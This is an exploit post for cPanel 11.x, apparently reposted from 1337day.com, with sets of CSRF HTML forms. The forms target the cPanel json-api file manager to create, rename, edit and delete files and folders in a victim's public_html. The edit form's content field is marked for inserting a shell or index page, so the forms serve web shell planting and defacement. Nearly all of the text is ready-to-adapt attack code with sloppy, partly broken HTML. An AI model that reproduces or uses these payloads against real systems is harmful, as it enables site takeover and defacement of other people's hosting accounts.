Bài liên quan
Cpanel 11.X Multiple CSRF Vulnerability
====================================================================
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.cpanel.net/
.:. Gr34T$ T0 [aboud-el]
####################################################################
===[ Exploit ]===
Add File
========
<form method="POST" name="form0" action="http://IP:2082/json-api/cpanel">
<input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/>
<input type="hidden" name="cpanel_jsonapi_func" value="mkfile"/>
<input type="hidden" name="path" value="/public_html"/>
<input type="hidden" name="name" value="Palestine.php"/>
</form>
</body>
</html>
<input type="hidden" name="name" value="Palestine.php"/>  Ur File Name
Rename File
===========
<form method="POST" name="form0" action="http://IP:2082/json-api/cpanel">
<input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/>
<input type="hidden" name="cpanel_jsonapi_func" value="fileop"/>
<input type="hidden" name="cpanel_jsonapi_apiversion" value="2"/>
<input type="hidden" name="filelist" value="1"/>
<input type="hidden" name="multiform" value="1"/>
<input type="hidden" name="doubledecode" value="0"/>
<input type="hidden" name="op" value="rename"/>
<input type="hidden" name="metadata" value="[object HTMLTableRowElement]"/>
<input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine.php"/>
<input type="hidden" name="destfiles" value="Test.php"/>
</body>
</html>
<input type="hidden" name="destfiles" value="Test.php"/>  New Name
Edit File
=========
<form method="POST" name="form0" action="http://IP:2082/json-api/cpanel">
<input type="hidden" name="cpanel_jsonapi_apiversion" value="2"/>
<input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/>
<input type="hidden" name="cpanel_jsonapi_func" value="savefile"/>
<input type="hidden" name="dir" value="/home/User/public_html"/>
<input type="hidden" name="filename" value="Palestine.php"/>
<input type="hidden" name="content" value="Ur Code (Shell Or Index)"/>
<input type="hidden" name="utf8_fallback" value="1"/>
<input type="hidden" name="charset" value="utf-8"/>
</form>
</body>
</html>
Delete File
============
<form method="POST" name="form0" action="http://IP:2082/json-api/cpanel">
<input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/>
<input type="hidden" name="cpanel_jsonapi_func" value="fileop"/>
<input type="hidden" name="cpanel_jsonapi_apiversion" value="2"/>
<input type="hidden" name="filelist" value="1"/>
<input type="hidden" name="multiform" value="1"/>
<input type="hidden" name="doubledecode" value="0"/>
<input type="hidden" name="op" value="unlink"/>
<input type="hidden" name="metadata" value="undefined"/>
<input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine.php"/>
</form>
</body>
</html>
<input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine.php"/>  File Name Delete
Add Folder
===========
<form method="POST" name="form0" action="http://IP:2082/json-api/cpanel">
<input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/>
<input type="hidden" name="cpanel_jsonapi_func" value="mkdir"/>
<input type="hidden" name="path" value="/public_html"/>
<input type="hidden" name="name" value="Palestine"/>
</form>
</body>
</html>
<input type="hidden" name="name" value="Palestine"/>  Ur Folder Name
Rename Folder
=============
<form method="POST" name="form0" action="http://IP:2082/json-api/cpanel">
<input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/>
<input type="hidden" name="cpanel_jsonapi_func" value="fileop"/>
<input type="hidden" name="cpanel_jsonapi_apiversion" value="2"/>
<input type="hidden" name="filelist" value="1"/>
<input type="hidden" name="multiform" value="1"/>
<input type="hidden" name="doubledecode" value="0"/>
<input type="hidden" name="op" value="rename"/>
<input type="hidden" name="metadata" value="[object HTMLTableRowElement]"/>
<input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine"/>
<input type="hidden" name="destfiles" value="Test"/>
</form>
</body>
</html>
<input type="hidden" name="destfiles" value="Test"/>  New Name
Delete Folder
=============
<form method="POST" name="form0" action="http://IP:2082/json-api/cpanel">
<input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/>
<input type="hidden" name="cpanel_jsonapi_func" value="fileop"/>
<input type="hidden" name="cpanel_jsonapi_apiversion" value="2"/>
<input type="hidden" name="filelist" value="1"/>
<input type="hidden" name="multiform" value="1"/>
<input type="hidden" name="doubledecode" value="0"/>
<input type="hidden" name="op" value="unlink"/>
<input type="hidden" name="metadata" value="undefined"/>
<input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine"/>
</form>
</body>
</html>
<input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine"/>  Folder Name Delete
####################################################################
# 1337day.com [2012-05-26]

Post a Comment

 
Top

Nhận xét mới đăng tải!

Loading…
X